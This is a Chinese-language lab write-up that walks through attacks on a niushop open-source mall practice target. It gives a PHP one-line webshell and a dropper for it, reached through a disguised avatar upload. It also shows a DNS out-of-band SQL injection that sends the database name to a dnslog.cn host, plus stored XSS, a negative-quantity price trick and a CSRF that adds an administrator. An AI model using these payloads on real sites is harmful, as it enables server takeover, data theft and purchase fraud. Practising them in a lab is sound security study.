niushop开源商城靶场漏洞

文件上传漏洞

先注册一个账号

来到个人信息修改个人头像

选择我们的马

#一句话(不想麻烦的选择一句话也可以)

<?php @eval($_POST"cmd");?>

#生成h.php文件

<?php

fputs(fopen('h.php','w'),'<?php @eval($_POST"cmd");?>');

?>

在BP中进行抓包,改为1.php

右键图片在网页新建打开图片标签;就能获取路径

去蚁剑连接生成的h.php就行

SQL注入漏洞

我们查看后台寻找功能点发现有一个地方可以执行 sql 命令

我们输入一个 sql 语句

发现没有回显,这时我们可以考虑使用外带注入

(select load_file(concat('\\\\',(select (database())),'96toab.dnslog.cn.dnslog.cn\\abc')))

得到数据库的名字为 niushop_b2c

获取表名

XSS漏洞

后台-->设置-->基础设置-->商城第三方统计代码

来到首页就会弹窗

0元购

在商品页面抓包

通过改变数量改变价格

在放行一次修改数量为-1

后面全部放行就OK了

CSRF漏洞

下载源码;制作添加管理员链接

添加管理员用户

BP抓包;制作SCRF

复制下来制作链接

admin管理员在已登录的状态点击我们的链接

相关推荐
自律懒人2 小时前
ChatGPT Work 上线当天实测:GPT-5.6 Sol 把 Codex 塞进桌面应用,跨应用自动做报表和 PPT,一个指令干 3 小时的活
javascript·开源
龙亘川14 小时前
开源本地 AI 智能体网关 OpenClaw 深度实践:架构解析、全场景部署与自动化落地指南
人工智能·架构·开源·openclaw
GitCode官方15 小时前
开源鸿蒙跨平台直播|QRN 跨端鸿蒙一体化实战
人工智能·华为·开源·harmonyos·atomgit
IvorySQL16 小时前
从双解析器到循环工程:IvorySQL 五年技术演进路线的深度观察
大数据·数据库·人工智能·postgresql·开源
CRMEB定制开发17 小时前
开源商城源码下载后怎么搭建?五步走通完整流程
小程序·开源·商城系统·私域运营
明哥聊AI21 小时前
开源发布|ZhDocParser:不是 OCR,而是面向 RAG 与 Agent 的中文复杂文档结构化解析工具
开源·ocr
小羊Yveesss1 天前
2026年如何自己搭建一个外贸网页?单页验证和完整网站的区别
微信小程序·小程序·开源
小灰灰搞电子1 天前
开源无边框库 QWindowkit 详解:原理、使用与实战
开源·无边框窗口
冬奇Lab1 天前
每日一个开源项目(第156篇):OpenDataLoader PDF - 基准测试第一名的开源 PDF 解析器,专为 RAG 设计
人工智能·开源·资讯
碎_浪1 天前
Mac 壁纸被 MDM 锁住?我做了个 2MB 的开源方案
macos·开源·swift